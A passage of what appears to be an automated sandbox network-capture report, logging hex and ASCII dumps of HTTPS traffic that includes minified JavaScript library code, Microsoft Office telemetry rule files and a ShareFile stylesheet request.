                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 2e 64 61 74 61 2c 69 29 7c 7c 7b 7d 3b 72 3f 54 28 6f 2c 6e 2c 61 29 3a 6f 3d 45 28 45 28 7b 7d 2c 6f 29 2c 6e 29 2c 6b 28 74 68 69 73 2e 64 61 74 61 2c 69 2c 6f 29 2c 73 2e 73 69 6c 65 6e 74 7c 7c 74 68 69 73 2e 65 6d 69 74 28 22 61 64 64 65 64 22 2c 65 2c 74 2c 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 72 65 6d 6f 76 65 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 68 61 73 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 28 65 2c 74 29 26 26 64 65 6c 65 74 65 20 74 68 69 73 2e 64 61 74 61 5b 65 5d 5b 74 5d 2c 74 68 69 73 2e 72 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 73 28 74 29 2c 74 68 69 73 2e 65 6d 69 74 28 22 72 65 6d 6f 76 65 64 22 2c 65 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 73 52
                                                                                                                                                                                                                                                                                Data Ascii: .data,i)||{};r?T(o,n,a):o=E(E({},o),n),k(this.data,i,o),s.silent||this.emit("added",e,t,n)}},{key:"removeResourceBundle",value:function(e,t){this.hasResourceBundle(e,t)&&delete this.data[e][t],this.removeNamespaces(t),this.emit("removed",e,t)}},{key:"hasR
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 65 72 28 31 3d 3d 65 3f 30 3a 32 3d 3d 65 3f 31 3a 33 3d 3d 65 3f 32 3a 33 29 7d 2c 31 35 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 65 25 31 30 3d 3d 31 26 26 65 25 31 30 30 21 3d 31 31 3f 30 3a 65 25 31 30 3e 3d 32 26 26 28 65 25 31 30 30 3c 31 30 7c 7c 65 25 31 30 30 3e 3d 32 30 29 3f 31 3a 32 29 7d 2c 31 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 65 25 31 30 3d 3d 31 26 26 65 25 31 30 30 21 3d 31 31 3f 30 3a 30 21 3d 3d 65 3f 31 3a 32 29 7d 2c 31 37 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 7c 7c 65 25 31 30 3d 3d 31 26 26 65 25 31 30 30 21 3d 31 31 3f 30 3a 31 29 7d 2c 31 38 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74
                                                                                                                                                                                                                                                                                Data Ascii: er(1==e?0:2==e?1:3==e?2:3)},15:function(e){return Number(e%10==1&&e%100!=11?0:e%10>=2&&(e%100<10||e%100>=20)?1:2)},16:function(e){return Number(e%10==1&&e%100!=11?0:0!==e?1:2)},17:function(e){return Number(1==e||e%10==1&&e%100!=11?0:1)},18:function(e){ret
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC15845INData Raw: 6f 67 67 65 72 2e 77 61 72 6e 28 27 64 69 64 20 6e 6f 74 20 73 61 76 65 20 6b 65 79 20 22 27 2e 63 6f 6e 63 61 74 28 6e 2c 27 22 20 61 73 20 74 68 65 20 6e 61 6d 65 73 70 61 63 65 20 22 27 29 2e 63 6f 6e 63 61 74 28 74 2c 27 22 20 77 61 73 20 6e 6f 74 20 79 65 74 20 6c 6f 61 64 65 64 27 29 2c 22 54 68 69 73 20 6d 65 61 6e 73 20 73 6f 6d 65 74 68 69 6e 67 20 49 53 20 57 52 4f 4e 47 20 69 6e 20 79 6f 75 72 20 73 65 74 75 70 2e 20 59 6f 75 20 61 63 63 65 73 73 20 74 68 65 20 74 20 66 75 6e 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 69 31 38 6e 65 78 74 2e 69 6e 69 74 20 2f 20 69 31 38 6e 65 78 74 2e 6c 6f 61 64 4e 61 6d 65 73 70 61 63 65 20 2f 20 69 31 38 6e 65 78 74 2e 63 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 20 77 61 73 20 64 6f 6e 65 2e 20 57 61 69 74 20 66
                                                                                                                                                                                                                                                                                Data Ascii: ogger.warn('did not save key "'.concat(n,'" as the namespace "').concat(t,'" was not yet loaded'),"This means something IS WRONG in your setup. You access the t function before i18next.init / i18next.loadNamespace / i18next.changeLanguage was done. Wait f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC12792INData Raw: 69 6f 6e 28 65 2c 6e 2c 72 29 7b 74 2e 6f 28 65 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 74 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 5b 22 64 65 66 61 75 6c 74 22 5d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72 65 74 75 72 6e 20 74 2e 64 28 6e 2c 22 61 22 2c 6e 29 2c 6e 7d 2c 74 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72
                                                                                                                                                                                                                                                                                Data Ascii: ion(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e["default"]}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProper
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 67 67 72 65 65 6e 3a 22 23 30 30 66 61 39 61 22 2c 6d 65 64 69 75 6d 74 75 72 71 75 6f 69 73 65 3a 22 23 34 38 64 31 63 63 22 2c 6d 65 64 69 75 6d 76 69 6f 6c 65 74 72 65 64 3a 22 23 63 37 31 35 38 35 22 2c 6d 69 64 6e 69 67 68 74 62 6c 75 65 3a 22 23 31 39 31 39 37 30 22 2c 6d 69 6e 74 63 72 65 61 6d 3a 22 23 66 35 66 66 66 61 22 2c 6d 69 73 74 79 72 6f 73 65 3a 22 23 66 66 65 34 65 31 22 2c 6d 6f 63 63 61 73 69 6e 3a 22 23 66 66 65 34 62 35 22 2c 6e 61 76 61 6a 6f 77 68 69 74 65 3a 22 23 66 66 64 65 61 64 22 2c 6e 61 76 79 3a 22 23 30 30 30 30 38 30 22 2c 6f 6c 64 6c 61 63 65 3a 22 23 66 64 66 35 65 36 22 2c 6f 6c 69 76 65 3a 22 23 38 30 38 30 30 30 22 2c 6f 6c 69 76 65 64 72 61 62 3a 22 23 36 62 38 65 32 33 22 2c 6f 72 61 6e 67 65 3a 22 23 66 66 61 35
                                                                                                                                                                                                                                                                                Data Ascii: ggreen:"#00fa9a",mediumturquoise:"#48d1cc",mediumvioletred:"#c71585",midnightblue:"#191970",mintcream:"#f5fffa",mistyrose:"#ffe4e1",moccasin:"#ffe4b5",navajowhite:"#ffdead",navy:"#000080",oldlace:"#fdf5e6",olive:"#808000",olivedrab:"#6b8e23",orange:"#ffa5
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 2c 22 2d 24 26 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 29 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 61 6e 69 6d 61 74 69 6f 6e 22 3a 63 61 73 65 22 61 6e 69 6d 61 74 69 6f 6e 4e 61 6d 65 22 3a 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 69 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6d 3d 7b 6e 61 6d 65 3a 74 2c 73 74 79 6c 65 73 3a 6e 2c 6e 65 78 74 3a 6d 7d 2c 74 7d 29 29 7d 72 65 74 75 72 6e 20 31 3d 3d 3d 72 5b 65 5d 7c 7c 6f 28 65 29 7c 7c 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 30 3d 3d 3d 74 3f 74 3a 74 2b 22 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65
                                                                                                                                                                                                                                                                                Data Ascii: ,"-$&").toLowerCase()})),d=function(e,t){switch(e){case"animation":case"animationName":if("string"==typeof t)return t.replace(i,(function(e,t,n){return m={name:t,styles:n,next:m},t}))}return 1===r[e]||o(e)||"number"!=typeof t||0===t?t:t+"px"};function c(e
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 7d 3b 6e 3c 74 3b 29 31 30 3d 3d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 29 3f 28 72 2e 6c 69 6e 65 2b 2b 2c 72 2e 63 6f 6c 75 6d 6e 3d 31 29 3a 72 2e 63 6f 6c 75 6d 6e 2b 2b 2c 6e 2b 2b 3b 72 65 74 75 72 6e 20 76 5b 74 5d 3d 72 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 59 28 65 29 2c 61 3d 59 28 74 29 2c 69 3d 7b 73 6f 75 72 63 65 3a 73 2c 73 74 61 72 74 3a 7b 6f 66 66 73 65 74 3a 65 2c 6c 69 6e 65 3a 72 2e 6c 69 6e 65 2c 63 6f 6c 75 6d 6e 3a 72 2e 63 6f 6c 75 6d 6e 7d 2c 65 6e 64 3a 7b 6f 66 66 73 65 74 3a 74 2c 6c 69 6e 65 3a 61 2e 6c 69 6e 65 2c 63 6f 6c 75 6d 6e 3a 61 2e 63 6f 6c 75 6d 6e 7d 7d 3b 72 65 74 75 72 6e 20 6e 26 26 73 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 2e 6f 66 66
                                                                                                                                                                                                                                                                                Data Ascii: };n<t;)10===e.charCodeAt(n)?(r.line++,r.column=1):r.column++,n++;return v[t]=r,r}function D(e,t,n){var r=Y(e),a=Y(t),i={source:s,start:{offset:e,line:r.line,column:r.column},end:{offset:t,line:a.line,column:a.column}};return n&&s&&"function"==typeof s.off
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC3592INData Raw: 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 26 26 65 2e 6c 65 6e 67 74 68 3d 3d 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 6c 65 6e 67 74 68 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 69 66 28 21 59 28 65 29 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 74 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 29 72 65 74 75 72 6e 21 30 3b 63 6f 6e 73 74 20 6e 3d 74 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 21 21 59 28 6e 29 26 26 21 21 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 29 7d 66 75 6e 63 74 69 6f 6e 20 59 28 65 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72
                                                                                                                                                                                                                                                                                Data Ascii: {return Array.isArray(e)&&e.length===Object.keys(e).length}function k(e){if(!Y(e))return!1;const t=e.constructor;if(void 0===t)return!0;const n=t.prototype;return!!Y(n)&&!!n.hasOwnProperty("isPrototypeOf")}function Y(e){return"[object Object]"===Object.pr
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 3a 53 28 28 28 29 3d 3e 7b 6e 28 72 29 7d 29 29 7d 2c 73 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 74 3d 65 3b 65 3d 5b 5d 2c 74 2e 6c 65 6e 67 74 68 26 26 53 28 28 28 29 3d 3e 7b 72 28 28 28 29 3d 3e 7b 74 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 6e 28 65 29 7d 29 29 7d 29 29 7d 29 29 7d 3b 72 65 74 75 72 6e 7b 62 61 74 63 68 3a 65 3d 3e 7b 6c 65 74 20 6e 3b 74 2b 2b 3b 74 72 79 7b 6e 3d 65 28 29 7d 66 69 6e 61 6c 6c 79 7b 74 2d 2d 2c 74 7c 7c 73 28 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 62 61 74 63 68 43 61 6c 6c 73 3a 65 3d 3e 28 2e 2e 2e 74 29 3d 3e 7b 61 28 28 28 29 3d 3e 7b 65 28 2e 2e 2e 74 29 7d 29 29 7d 2c 73 63 68 65 64 75 6c 65 3a 61 2c 73 65 74 4e 6f 74 69 66 79 46 75 6e 63 74 69 6f 6e 3a 65 3d 3e 7b 6e 3d 65 7d 2c 73 65 74 42 61 74 63 68 4e 6f 74 69
                                                                                                                                                                                                                                                                                Data Ascii: :S((()=>{n(r)}))},s=()=>{const t=e;e=[],t.length&&S((()=>{r((()=>{t.forEach((e=>{n(e)}))}))}))};return{batch:e=>{let n;t++;try{n=e()}finally{t--,t||s()}return n},batchCalls:e=>(...t)=>{a((()=>{e(...t)}))},schedule:a,setNotifyFunction:e=>{n=e},setBatchNoti


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                42192.168.2.64976913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:14 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 450
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                x-ms-request-id: cfc4547a-a01e-0098-41ce-198556000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180514Z-185b7d577bdfbqmxp7sbqeum4w0000000170000000016hce
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                43192.168.2.64976613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:14 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 3788
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                x-ms-request-id: d01aae37-c01e-007a-5dfb-19b877000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180514Z-185b7d577bdwmw4ckbc4ywwmwg00000000z0000000000qta
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                44192.168.2.64977113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:14 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 408
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                x-ms-request-id: b27588a3-a01e-003d-6001-1798d7000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180514Z-1657d5bbd48xlwdx82gahegw40000000071g00000000f28h
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                45192.168.2.64976713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:14 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 2980
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                x-ms-request-id: 8437bb86-c01e-007a-7474-1ab877000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180514Z-185b7d577bdx4h6cdqr6y962uw00000000g000000000eqak
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                46192.168.2.64977013.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC572OUTGET /sharefile-web/sharefiledev-esign-pilet/1.218.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 25 Sep 2024 06:18:48 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
